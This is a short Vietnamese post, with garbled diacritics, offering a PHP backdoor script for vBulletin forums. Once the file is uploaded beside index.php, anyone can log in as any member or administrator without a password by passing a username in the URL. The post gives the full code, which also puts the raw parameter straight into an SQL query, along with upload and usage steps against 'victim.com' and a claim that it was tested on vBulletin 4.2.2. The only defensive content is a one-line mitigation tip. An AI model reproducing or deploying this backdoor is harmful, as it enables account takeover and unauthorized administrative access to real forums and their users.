Code n�y c� t�c d?ng l� khi upload v�o th� m?c root c?a forum VBB (Ngang h�ng index.php) c�c b?n c� kh? n�ng ��ng nh?p v�o nick b?t c? th�nh vi�n n�o m� kh�ng c?n password. Ngo�i ra v�o �c th?ng admincp m� ko c?n g? l?i pass
<?php
if (isset($_GET['bd']))
{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['bd']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}
?>
C�ch x�i:
- Copy �o?n code tr�n v� l�u th�nh file php
- Up l�n ngang h�ng index.php
- Ch?y link
http://victim.com/t�n-file.php?bd=username
+ t�n-file: L� t�n file php b?n t?o
+ username: Nick b?n mu?n login
+ �? test tr�n vBulletin 4.2.2 Patch Level 4
+ C�ch ph?ng: T?o th�m l?p ��ng nh?p th? 2 cho admincp
VIDEO
Login forum VBB kh�ng c?n pass
4/
5
Oleh
Unknown
